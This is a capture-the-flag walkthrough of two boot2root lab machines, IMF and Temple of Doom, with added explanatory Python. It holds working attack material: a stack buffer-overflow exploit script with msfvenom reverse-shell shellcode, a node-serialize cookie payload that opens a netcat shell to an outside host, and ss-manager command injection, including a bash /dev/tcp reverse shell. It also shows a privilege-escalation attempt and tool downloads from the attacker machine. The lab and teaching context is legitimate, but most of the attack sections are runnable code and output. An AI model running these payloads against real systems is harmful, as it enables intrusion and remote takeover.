EAX: 0xffffd254 (“Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9AfT\322\377\377Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag”…)
EBX: 0x0
ECX: 0xf7fa4890 –> 0x0
EDX: 0x16
ESI: 0xf7fa3000 –> 0x1d9d6c
EDI: 0xf7fa3000 –> 0x1d9d6c
EBP: 0x35664134 (‘4Af5’)
ESP: 0xffffd300 (“f7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9”)
EIP: 0x41366641 (‘Af6A’)
EFLAGS: 0x10286 (carry PARITY adjust zero SIGN trap INTERRUPT direction overflow)
[————————————-code————————————-]
Invalid $PC address: 0x41366641
[————————————stack————————————-]
0000| 0xffffd300 (“f7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9”)
0004| 0xffffd304 (“8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9”)
0008| 0xffffd308 (“Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9”)
0012| 0xffffd30c (“g1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9”)
0016| 0xffffd310 (“2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9”)
0020| 0xffffd314 (“Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9”)
0024| 0xffffd318 (“g5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9”)
0028| 0xffffd31c (“6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9”)
[——————————————————————————]
Legend: code, data, rodata, value
Stopped reason: SIGSEGV
0x41366641 in ?? ()

gdb-peda$ info frame
Stack level 0, frame at 0xffffd304:
eip = 0x41366641; saved eip = 0x66413766
called by frame at 0xffffd308
Arglist at 0xffffd2fc, args:
Locals at 0xffffd2fc, Previous frame’s sp is 0xffffd304
Saved registers:
eip at 0xffffd300

Then finding the offset of the saved return address within the buffer:

root@kali:~/boxes/imf# /usr/bin/msf-pattern_offset -q 41366641
[*] Exact match at offset 168
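An added example, not part of the original write-up: a Python re-implementation of msf-pattern_create / msf-pattern_offset so the offset arithmetic can be reproduced without Metasploit. It regenerates the cyclic pattern, converts a crashed register value into the little-endian bytes it was overwritten with, finds the offset, and lays out the payload shape used in the exploit below (shellcode, NOP padding up to the offset, then the return address). The register values are the ones from the GDB dump above; that EAX points at the buffer start is read off that dump, while the exact gadget behind the return address is not shown on the page and is an assumption.

```python
import string
import struct

# msf-pattern_create: every (upper, lower, digit) triplet in order,
# Aa0Aa1...Aa9Ab0...Zz9, i.e. 26*26*10 triplets = 20280 unique bytes.
MAX_PATTERN = 26 * 26 * 10 * 3


def pattern_create(length):
    """Return the first `length` characters of the Metasploit cyclic pattern."""
    if length > MAX_PATTERN:
        raise ValueError("pattern repeats after %d bytes" % MAX_PATTERN)
    parts = []
    for upper in string.ascii_uppercase:
        for lower in string.ascii_lowercase:
            for digit in string.digits:
                parts.append(upper + lower + digit)
                if len(parts) * 3 >= length:
                    return "".join(parts)[:length]
    return "".join(parts)[:length]


def pattern_offset(value, width=4):
    """Offset of a crashed register value inside the pattern, or -1.

    `value` is either the register contents as an int from the debugger
    (e.g. EIP = 0x41366641) or the literal text it spells. Ints are
    unpacked little-endian, exactly as the overwrite landed on the stack,
    so 0x41366641 becomes "Af6A".
    """
    if isinstance(value, int):
        fmt = "<I" if width == 4 else "<Q"
        try:
            needle = struct.pack(fmt, value).decode("ascii")
        except (struct.error, UnicodeDecodeError):
            return -1
    else:
        needle = value
    return pattern_create(MAX_PATTERN).find(needle)


def build_payload(shellcode, offset, ret_addr, nop=b"\x90"):
    """Lay out shellcode + NOP padding + return address.

    At the crash EAX holds the start of the report buffer, so the shellcode
    goes first; padding fills up to the saved-EIP slot at `offset`, and
    `ret_addr` (assumed to be a gadget that jumps through EAX) overwrites EIP.
    """
    if len(shellcode) > offset:
        raise ValueError("shellcode (%d bytes) does not fit before offset %d"
                         % (len(shellcode), offset))
    return shellcode + nop * (offset - len(shellcode)) + struct.pack("<I", ret_addr)


if __name__ == "__main__":
    # Register values from the crash above: EIP = 'Af6A', EBP = '4Af5'.
    print("EIP offset:", pattern_offset(0x41366641))  # 168
    print("EBP offset:", pattern_offset(0x35664134))  # 164
    demo = build_payload(b"\xcc" * 95, 168, 0x08048563)
    print("payload length:", len(demo))                # 172
```

The EBP offset of 164 sitting exactly four bytes before the EIP offset is the sanity check worth doing here: it confirms a classic saved-EBP / saved-EIP pair on the stack rather than a pointer corrupted somewhere else.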

So now I can start building the exploit:

msfvenom -p linux/x86/shell_reverse_tcp LHOST=192.168.0.11 LPORT=4444 -f python -b "\x00\x0a\x0d"
[-] No platform was selected, choosing Msf::Module::Platform::Linux from the payload
[-] No arch selected, selecting arch: x86 from the payload
Found 11 compatible encoders
Attempting to encode payload with 1 iterations of x86/shikata_ga_nai
x86/shikata_ga_nai succeeded with size 95 (iteration=0)
x86/shikata_ga_nai chosen with final size 95
Payload size: 95 bytes
Final size of python file: 479 bytes
buf = b""
buf += b"\xbf\x55\xf0\xbc\x40\xda\xcc\xd9\x74\x24\xf4\x5a\x2b"
buf += b"\xc9\xb1\x12\x31\x7a\x12\x83\xc2\x04\x03\x2f\xfe\x5e"
buf += b"\xb5\xfe\x25\x69\xd5\x53\x99\xc5\x70\x51\x94\x0b\x34"
buf += b"\x33\x6b\x4b\xa6\xe2\xc3\x73\x04\x94\x6d\xf5\x6f\xfc"
buf += b"\xad\xad\x90\xf7\x45\xac\x90\x16\xca\x39\x71\xa8\x94"
buf += b"\x69\x23\x9b\xeb\x89\x4a\xfa\xc1\x0e\x1e\x94\xb7\x21"
buf += b"\xec\x0c\x20\x11\x3d\xae\xd9\xe4\xa2\x7c\x49\x7e\xc5"
buf += b"\x30\x66\x4d\x86"

Let's build exploit.py:

I will run it from my Kali box, as the target only has python3 and I had issues concatenating bytes and text!

#!/usr/bin/env python
# Bytes literals throughout, so this runs unchanged under Python 2 or 3.
import socket
import struct

host = "192.168.0.18"
port = 7788

# Offset to the saved return address, from msf-pattern_offset.
OFFSET = 168

# Address that overwrites EIP (author's value). At the crash EAX points at the
# start of the report buffer, so this is presumably a gadget in the non-PIE
# binary that jumps through EAX; the disassembly isn't shown here. Being in
# .text, it does not depend on the target's stack ASLR.
ret = struct.pack("<I", 0x08048563)

# msfvenom linux/x86/shell_reverse_tcp LHOST=192.168.0.11 LPORT=4444 (95 bytes)
buf = b""
buf += b"\xbf\x55\xf0\xbc\x40\xda\xcc\xd9\x74\x24\xf4\x5a\x2b"
buf += b"\xc9\xb1\x12\x31\x7a\x12\x83\xc2\x04\x03\x2f\xfe\x5e"
buf += b"\xb5\xfe\x25\x69\xd5\x53\x99\xc5\x70\x51\x94\x0b\x34"
buf += b"\x33\x6b\x4b\xa6\xe2\xc3\x73\x04\x94\x6d\xf5\x6f\xfc"
buf += b"\xad\xad\x90\xf7\x45\xac\x90\x16\xca\x39\x71\xa8\x94"
buf += b"\x69\x23\x9b\xeb\x89\x4a\xfa\xc1\x0e\x1e\x94\xb7\x21"
buf += b"\xec\x0c\x20\x11\x3d\xae\xd9\xe4\xa2\x7c\x49\x7e\xc5"
buf += b"\x30\x66\x4d\x86"

# NOP padding so that ret lands exactly at OFFSET (95 + 73 = 168).
pad = b"\x90" * (OFFSET - len(buf))
payload = buf + pad + ret

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((host, port))
s.recv(1024)             # banner and "Agent ID :" prompt
s.send(b"48093572\n")    # Agent ID recovered with edb
s.recv(1024)             # main menu
s.send(b"3\n")           # 3. Submit Report
s.recv(1024)             # "Enter report update:" prompt
s.send(payload)          # overflow the report buffer
s.recv(1024)
s.close()

./exploit.py

Bingo!

root@kali:~/boxes/imf# nc -nvlp 4444
listening on [any] 4444 …
connect to [192.168.0.11] from (UNKNOWN) [192.168.0.18] 54970
id
uid=0(root) gid=0(root) groups=0(root)

cd /root
ls
Flag.txt
TheEnd.txt

cat Flag.txt
flag6{R2gwc3RQcm90MGMwbHM=}

cat TheEnd.txt
____ _ __ __
/ _/_ _ ___ ___ ___ ___ (_) / / /__
_/ // ' \/ _ \/ _ \(_-<(_-</ / _ \/ / -_)
/___/_/_/_/ .__/\___/___/___/_/_.__/_/\__/
__ __/_/ _
/ |/ (_)__ ___ (_)__ ___
/ /|_/ / (_-<(_-</ / _ \/ _ \
/_/__/_/_/___/___/_/\___/_//_/
/ __/__ ___________
/ _// _ \/ __/ __/ -_)
/_/ \___/_/ \__/\__/

Congratulations on finishing the IMF Boot2Root CTF. I hope you enjoyed it.
Thank you for trying this challenge and please send any feedback.

Geckom
Twitter: @g3ck0ma
Email: geckom@redteamr.com
Web: http://redteamr.com

Special Thanks
Binary Advice: OJ (@TheColonial) and Justin Stevens (@justinsteven)
Web Advice: Menztrual (@menztrual)
Testers: dook (@dooktwit), Menztrual (@menztrual), llid3nlq and OJ(@TheColonial)

All the flags and their decoded version:

flag1{YWxsdGhlZmlsZXM=}
allthefiles

flag2{aW1mYWRtaW5pc3RyYXRvcg==}
imfadministrator

flag3{Y29udGludWVUT2Ntcw==}
continueTOcms

flag4{dXBsb2Fkcjk0Mi5waHA=}
uploadr942.php

flag5{YWdlbnRzZXJ2aWNlcw==}
agentservices

flag6{R2gwc3RQcm90MGMwbHM=}
Gh0stProt0c0ls

The Temple of Doom

Found the target at 192.168.1.138..

So now let’s scan it quickly:

root@kali:~# nmap -sC -sV 192.168.1.138
Starting Nmap 7.80 ( https://nmap.org ) at 2019-09-10 20:47 UTC
Nmap scan report for 192.168.1.138
Host is up (0.00026s latency).
Not shown: 998 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.7 (protocol 2.0)
| ssh-hostkey:
| 2048 95:68:04:c7:42:03:04:cd:00:4e:36:7e:cd:4f:66:ea (RSA)
| 256 c3:06:5f:7f:17:b6:cb:bc:79:6b:46:46:cc:11:3a:7d (ECDSA)
|_ 256 63:0c:28:88:25:d5:48:19:82:bb:bd:72:c6:6c:68:50 (ED25519)
666/tcp open http Node.js Express framework
|_http-title: Site doesn’t have a title (text/html; charset=utf-8).
MAC Address: 08:00:27:6E:99:04 (Oracle VirtualBox virtual NIC)

Love the 666 port! Let's check it:

OK, not much.... Need to enumerate more:

gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt --url http://192.168.1.138:666 > directories

more directories
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url: http://192.168.1.138:666
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Status codes: 200,204,301,302,307,401,403
[+] User Agent: gobuster/3.0.1
[+] Timeout: 10s
===============================================================
2019/09/10 20:54:17 Starting gobuster
===============================================================
===============================================================
2019/09/10 20:55:12 Finished
===============================================================

And Nikto:

nikto -url http://192.168.1.138:666
– Nikto v2.1.6
—————————————————————————
+ Target IP: 192.168.1.138
+ Target Hostname: 192.168.1.138
+ Target Port: 666
+ Start Time: 2019-09-10 20:55:04 (GMT0)
—————————————————————————
+ Server: No banner retrieved
+ Retrieved x-powered-by header: Express
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Allowed HTTP Methods: GET, HEAD
+ ERROR: Error limit (20) reached for host, giving up. Last error: error reading HTTP response
+ Scan terminated: 20 error(s) and 5 item(s) reported on remote host
+ End Time: 2019-09-10 20:55:13 (GMT0) (9 seconds)
—————————————————————————

Not really lucky for now….

Searchsploit was not very helpful, so let's try Burp:

GET / HTTP/1.1
Host: 192.168.1.138:666
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: profile=eyJ1c2VybmFtZSI6IkFkbWluIiwiY3NyZnRva2VuIjoidTMydDRvM3RiM2dnNDMxZnMzNGdnZGdjaGp3bnphMGw9IiwiRXhwaXJlcz0iOkZyaWRheSwgMTMgT2N0IDIwMTggMDA6MDA6MDAgR01UIn0%3D
Connection: close
Upgrade-Insecure-Requests: 1
If-None-Match: W/"24-xWt5IUP3GfGbHraPgY5EGPpcNzA"

So let's see what's in the cookie. It's base64 (the trailing %3D is a URL-encoded = padding character), and decoding it gives:

{"username":"Admin","csrftoken":"u32t4o3tb3gg431fs34ggdgchjwnza0l=","Expires=":Friday, 13 Oct 2018 00:00:00 GMT"}

Note this is not even valid JSON: the Expires value is unquoted. (Feeding Burp's decoder the still URL-encoded value leaves a garbled In0%3D tail, which is what it showed me first.)

So now I have a username and a token…

With Burp, I tried to pass just the username value:

GET / HTTP/1.1
Host: 192.168.1.138:666
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: profile=eyJ1c2VybmFtZSI6IkFkbWluIn0=
Connection: close
Upgrade-Insecure-Requests: 1
If-None-Match: W/"24-xWt5IUP3GfGbHraPgY5EGPpcNzA"

And I get a welcome page.

So the server deserializes whatever JSON object it finds in the cookie. The _$$ND_FUNC$$_ prefix used below is the marker the node-serialize module's unserialize() looks for: any string value starting with it is passed to eval(), and ending the function literal with () turns it into an IIFE that runs at parse time, before the application ever touches the username. Let's try to get a shell that way.

Creating a payload:

{"username":"_$$ND_FUNC$$_function(){return require('child_process').execSync('nc 192.168.1.123 4444 -e /bin/sh',(e,out,err)=>{console.log(out);}); }()"}

Then base64-encode it.

Then on Kali:

nc -nlvp 4444
listening on [any] 4444 …

Then in Burp:

GET / HTTP/1.1
Host: 192.168.1.138:666
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: profile=eyJ1c2VybmFtZSI6Il8kJE5EX0ZVTkMkJF9mdW5jdGlvbigpe3JldHVybiByZXF1aXJlKCdjaGlsZF9wcm9jZXNzJykuZXhlY1N5bmMoJ25jIDE5Mi4xNjguMS4xMjMgNDQ0NCAtZSAvYmluL3NoJywoZSxvdXQsZXJyKT0+e2NvbnNvbGUubG9nKG91dCk7fSk7IH0oKSJ9
Connection: close
Upgrade-Insecure-Requests: 1
If-None-Match: W/"24-xWt5IUP3GfGbHraPgY5EGPpcNzA"

Bingo a shell!

connect to [192.168.1.123] from (UNKNOWN) [192.168.1.138] 47718
id
uid=1001(nodeadmin) gid=1001(nodeadmin) groups=1001(nodeadmin)

So as usual, let’s upgrade:

python -c 'import pty; pty.spawn("/bin/bash")'
[nodeadmin@localhost ~]$

CTRL Z
stty raw -echo
fg and two times ENTER

export TERM=screen
reset

Then checking sudo, just in case... (note that this is ls -l on the binary rather than sudo -l; it only shows that sudo is installed and setuid root):

[nodeadmin@localhost ~]$ ll /usr/bin/sudo -l
---s--x--x. 1 root root 158608 Feb 9 2018 /usr/bin/sudo

So I uploaded linenum:

on Kali:

root@kali:~/tools# python -m SimpleHTTPServer 9000
Serving HTTP on 0.0.0.0 port 9000 …

On the target:

wget http://192.168.1.123:9000/linenum.sh
wget http://192.168.1.123:9000/linenum.sh
--2019-09-12 13:24:23-- http://192.168.1.123:9000/linenum.sh
Connecting to 192.168.1.123:9000… connected.
HTTP request sent, awaiting response… 200 OK
Length: 45652 (45K) [text/x-sh]
Saving to: ‘linenum.sh’

linenum.sh 100%[===================>] 44.58K –.-KB/s in 0s

2019-09-12 13:24:23 (410 MB/s) – ‘linenum.sh’ saved [45652/45652]

[nodeadmin@localhost ~]$ ll
ll
total 88
drwx------. 5 nodeadmin nodeadmin 4096 Sep 12 13:24 .
drwxr-xr-x. 4 root root 4096 Jun 2 2018 ..
-rw-------. 1 nodeadmin nodeadmin 1 Jun 7 2018 .bash_history
-rw-r--r--. 1 nodeadmin nodeadmin 18 Mar 15 2018 .bash_logout
-rw-r--r--. 1 nodeadmin nodeadmin 193 Mar 15 2018 .bash_profile
-rw-r--r--. 1 nodeadmin nodeadmin 231 Mar 15 2018 .bashrc
drwx------ 3 nodeadmin nodeadmin 4096 Jun 1 2018 .config
-rw------- 1 nodeadmin nodeadmin 16 Jun 3 2018 .esd_auth
drwxr-xr-x 4 nodeadmin nodeadmin 4096 Jun 3 2018 .forever
-rw-rw-r-- 1 nodeadmin nodeadmin 45652 Jul 16 12:58 linenum.sh
drwxrwxr-x. 3 nodeadmin nodeadmin 4096 May 30 2018 .web

[nodeadmin@localhost ~]$ chmod +x linenum.sh
chmod +x linenum.sh
[nodeadmin@localhost ~]$ ./linenum.sh -t > enum

[-] Kernel information:
Linux localhost.localdomain 4.16.3-301.fc28.x86_64 #1 SMP Mon Apr 23 21:59:58 UTC 2018 x86_64 x86_64 x86_64 GNU/Linux

[-] Specific release information:
Fedora release 28 (Twenty Eight)
NAME=Fedora
VERSION=”28 (Workstation Edition)”
ID=fedora
VERSION_ID=28
PLATFORM_ID=”platform:f28″
PRETTY_NAME=”Fedora 28 (Workstation Edition)”

### JOBS/TASKS ##########################################
[-] Cron jobs:
-rw-r--r--. 1 root root 0 Feb 7 2018 /etc/cron.deny
-rw-r--r--. 1 root root 451 Feb 7 2018 /etc/crontab

/etc/cron.d:
total 24
drwxr-xr-x. 2 root root 4096 Apr 25 2018 .
drwxr-xr-x. 135 root root 12288 Sep 10 19:35 ..
-rw-r--r--. 1 root root 128 Feb 7 2018 0hourly
-rw-r--r--. 1 root root 108 Aug 3 2017 raid-check

/etc/cron.daily:
total 28
drwxr-xr-x. 2 root root 4096 Jun 7 2018 .
drwxr-xr-x. 135 root root 12288 Sep 10 19:35 ..
-rwxr-xr-x. 1 root root 2239 Feb 7 2018 certwatch
-rwxr-xr-x 1 root root 232 Apr 19 2018 exim-tidydb
-rwxr-xr-x. 1 root root 189 Jan 4 2018 logrotate

/etc/cron.hourly:
total 20
drwxr-xr-x. 2 root root 4096 Apr 25 2018 .
drwxr-xr-x. 135 root root 12288 Sep 10 19:35 ..
-rwxr-xr-x. 1 root root 575 Feb 7 2018 0anacron

### INTERESTING FILES ####################################
[-] Useful file locations:
/usr/bin/nc
/usr/bin/wget
/usr/bin/curl

[-] SUID files:
-rws--x--x. 1 root root 41496 Feb 23 2018 /usr/sbin/userhelper
-rwsr-xr-x. 1 root root 11720 Feb 8 2018 /usr/sbin/pam_timestamp_check
-rwsr-xr-x. 1 root root 28280 Aug 27 2017 /usr/sbin/mtr-packet
-rwsr-xr-x. 1 root root 11768 Feb 9 2018 /usr/sbin/usernetctl
-rwsr-xr-x 1 root root 1408432 Apr 19 2018 /usr/sbin/exim
-rwsr-xr-x. 1 root root 123944 Apr 11 2018 /usr/sbin/mount.nfs
-rwsr-xr-x. 1 root root 38080 Feb 8 2018 /usr/sbin/unix_chkpwd
-rwsr-xr-x. 1 root root 20224 Mar 21 2018 /usr/libexec/gstreamer-1.0/gst-ptp-helper
-rwsr-xr-x. 1 root root 11952 Apr 12 2018 /usr/libexec/Xorg.wrap
-rwsr-sr-x. 1 abrt abrt 15856 Mar 27 2018 /usr/libexec/abrt-action-install-debuginfo-to-abrt-cache
-rwsr-x---. 1 root dbus 57960 Oct 30 2017 /usr/libexec/dbus-1/dbus-daemon-launch-helper
-rwsr-xr-x. 1 root root 44160 Feb 6 2018 /usr/bin/newgidmap
-rwsr-xr-x. 1 root root 32848 Feb 7 2018 /usr/bin/fusermount
-rws--x--x. 1 root root 25936 Mar 27 2018 /usr/bin/chsh
-rwsr-xr-x. 1 root root 59752 Feb 7 2018 /usr/bin/crontab
-rwsr-xr-x. 1 root root 50304 Mar 27 2018 /usr/bin/mount
-rwsr-xr-x. 1 root root 55440 Feb 25 2018 /usr/bin/at
-rwsr-xr-x. 1 root root 46328 Mar 27 2018 /usr/bin/su
-rwsr-xr-x. 1 root root 33136 Mar 27 2018 /usr/bin/umount
-rwsr-xr-x. 1 root root 44168 Feb 6 2018 /usr/bin/newuidmap
-rwsr-xr-x. 1 root root 28168 Apr 4 2018 /usr/bin/pkexec
-rws--x--x. 1 root root 30536 Mar 27 2018 /usr/bin/chfn
-rwsr-xr-x. 1 root root 89296 Feb 6 2018 /usr/bin/gpasswd
---s--x--x. 1 root root 158608 Feb 9 2018 /usr/bin/sudo
-rwsr-xr-x. 1 root root 29008 Apr 12 2018 /usr/bin/passwd
-rwsr-xr-x. 1 root root 82040 Feb 6 2018 /usr/bin/chage
-rwsr-xr-x. 1 root root 49432 Feb 6 2018 /usr/bin/newgrp
-rwsr-xr-x 1 root root 10480 Jun 1 2018 /usr/local/lib/authbind/helper
-rwsr-xr-x. 1 root root 16304 Apr 4 2018 /usr/lib/polkit-1/polkit-agent-helper-1

[+] Possibly interesting SUID files:
-rwsr-xr-x. 1 root root 28280 Aug 27 2017 /usr/sbin/mtr-packet

[-] SGID files:
-rwxr-sr-x. 1 root root 7608 Feb 9 2018 /usr/sbin/netreport
-rwx--s--x. 1 root lock 16024 Apr 12 2018 /usr/sbin/lockdev
-rwx--s--x. 1 root utmp 11704 Feb 26 2018 /usr/libexec/utempter/utempter
-r-xr-sr-x. 1 root ssh_keys 468032 Apr 12 2018 /usr/libexec/openssh/ssh-keysign
-rwsr-sr-x. 1 abrt abrt 15856 Mar 27 2018 /usr/libexec/abrt-action-install-debuginfo-to-abrt-cache
-rwxr-sr-x. 1 root tty 20408 Mar 27 2018 /usr/bin/write
-rwx--s--x. 1 root slocate 45064 Feb 9 2018 /usr/bin/locate

Nothing really juicy. However, I noticed that PulseAudio is running, and searchsploit has an exploit for it:
PulseAudio setuid – Local Privilege Escalation | exploits/linux/local/9207.sh

However, gcc is not on the target, so I modified the exploit script to compile its two helpers on my 64-bit machine (as 32-bit binaries) and commented out the line that launches the race locally:

gcc -m32 -o $workdir/pa_race $workdir/pa_race.c
gcc -m32 -o $workdir/sh $workdir/sh.c

#$workdir/pa_race

Then I changed to /tmp and started an HTTP server:

python -m SimpleHTTPServer 9000

Then on the target:

[nodeadmin@localhost ~]$ wget http://192.168.0.11:9000/sh
--2019-09-16 10:37:03-- http://192.168.0.11:9000/sh
Connecting to 192.168.0.11:9000... connected.
HTTP request sent, awaiting response... 200 OK
Length: 15604 (15K) [application/octet-stream]
Saving to: 'sh'

sh 100%[===================>] 15.24K --.-KB/s in 0s

2019-09-16 10:37:03 (178 MB/s) - 'sh' saved [15604/15604]

[nodeadmin@localhost ~]$ wget http://192.168.0.11:9000/pa_race
--2019-09-16 10:37:09-- http://192.168.0.11:9000/pa_race
Connecting to 192.168.0.11:9000... connected.
HTTP request sent, awaiting response... 200 OK
Length: 15896 (16K) [application/octet-stream]
Saving to: 'pa_race'

pa_race 100%[===================>] 15.52K --.-KB/s in 0s

2019-09-16 10:37:09 (250 MB/s) - 'pa_race' saved [15896/15896]

Then:

[nodeadmin@localhost ~]$ chmod +x sh
[nodeadmin@localhost ~]$ chmod +x pa_race
[nodeadmin@localhost ~]$ ./pa_race
link: Invalid cross-device link

CRAP! The exploit creates a hard link with link(1), and link(2) fails with EXDEV ("Invalid cross-device link") when the source and the target are on different filesystems, which is what happened here.

OK, ps ax shows that ss-manager is running as fireman. Its control channel takes JSON commands over UDP (port 8839 here), and the method field ends up in a shell command unsanitised, so let's try this:

nc -u 127.0.0.1 8839
add: {"server_port":8003, "password":"test", "method":"||chmod -R 777 /home/fireman||"}
ok^C
[nodeadmin@localhost home]$ ll
total 8
drwxrwxrwx 6 fireman fireman 4096 Jun 7 2018 fireman
drwx——. 6 nodeadmin nodeadmin 4096 Sep 16 10:49 nodeadmin
[nodeadmin@localhost home]$ cd fireman
[nodeadmin@localhost fireman]$ ll
total 0

OK, nothing in fireman's home.

So let's get a shell as fireman. I saw in his history that he uses sudo -l, so it is worth seeing what he is allowed to run:

nc -u 127.0.0.1 8839
add: {"server_port":8003, "password":"test", "method":"||bash -i >& /dev/tcp/192.168.0.11/8080 0>&1||"}

On Kali: nc -lnvp 8080

root@kali:~/boxes/doom# nc -nvlp 8080
listening on [any] 8080 …
connect to [192.168.0.11] from (UNKNOWN) [192.168.0.16] 42730
bash: cannot set terminal process group (842): Inappropriate ioctl for device
bash: no job control in this shell
[fireman@localhost root]$ id
id
uid=1002(fireman) gid=1002(fireman) groups=1002(fireman)
[fireman@localhost root]$
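Why the "method" trick works, as an added example that is neither the author's code nor code from shadowsocks-libev: ss-manager reads JSON control messages from a UDP socket and, in the affected versions (the command injection was reported as CVE-2017-15924 against shadowsocks-libev 3.1.0; the page does not show which version runs here), assembles the ss-server command line as one string and hands it to the shell. The Python below models that string construction, checks the datagram used above for shell metacharacters, and puts the hardened alternative beside it: validate every field against an allowlist and pass an argv list to exec with no shell involved. The cipher allowlist, the password character set and the exact ss-server flags are assumptions made for the model.

```python
import json
import re

# Constructed allowlist for the model; the real cipher table lives in
# shadowsocks-libev and is not taken from the page.
ALLOWED_METHODS = frozenset({"aes-128-gcm", "aes-256-gcm",
                             "chacha20-ietf-poly1305"})
SHELL_META = re.compile(r"[|&;<>`$(){}\n]")
SAFE_PASSWORD = re.compile(r"^[A-Za-z0-9_.-]{1,64}$")


def manager_datagram(verb: str, **fields) -> bytes:
    """Build the UDP control message ss-manager expects: b'add: {...}'."""
    return f"{verb}: {json.dumps(fields)}".encode()


def parse_manager_datagram(datagram: bytes):
    """Split b'add: {...}' into ('add', dict); the manager does the same."""
    verb, _, body = datagram.decode().partition(":")
    return verb.strip(), json.loads(body)


def vulnerable_command_line(params: dict) -> str:
    """Model of the weak pattern: JSON fields pasted into one string that is
    handed to system(). The shell parses it, so a method of
    '||chmod -R 777 /home/fireman||' becomes: run ss-server (which fails,
    -m has no cipher name), OR run chmod, OR run the leftover flags."""
    return (f"ss-server -p {params['server_port']} -k {params['password']} "
            f"-m {params['method']} -u -f /var/run/ss-{params['server_port']}.pid")


def shell_injected(cmdline: str) -> bool:
    """True when the assembled string carries shell control characters."""
    return SHELL_META.search(cmdline) is not None


def hardened_argv(params: dict) -> list:
    """Validate each field, then return an argv list for execve()/subprocess
    with shell=False: nothing is left for a shell to interpret."""
    port = params.get("server_port")
    if isinstance(port, bool) or not isinstance(port, int) or not 1 <= port <= 65535:
        raise ValueError("server_port out of range")
    password = str(params.get("password", ""))
    if not SAFE_PASSWORD.match(password):
        raise ValueError("password contains characters outside the allowed set")
    method = params.get("method")
    if not isinstance(method, str) or method not in ALLOWED_METHODS:
        raise ValueError(f"unsupported cipher: {method!r}")
    return ["ss-server", "-p", str(port), "-k", password, "-m", method,
            "-u", "-f", f"/var/run/ss-{port}.pid"]


def rejects(params: dict) -> bool:
    """Convenience: does the hardened path refuse these parameters?"""
    try:
        hardened_argv(params)
    except ValueError:
        return True
    return False
```

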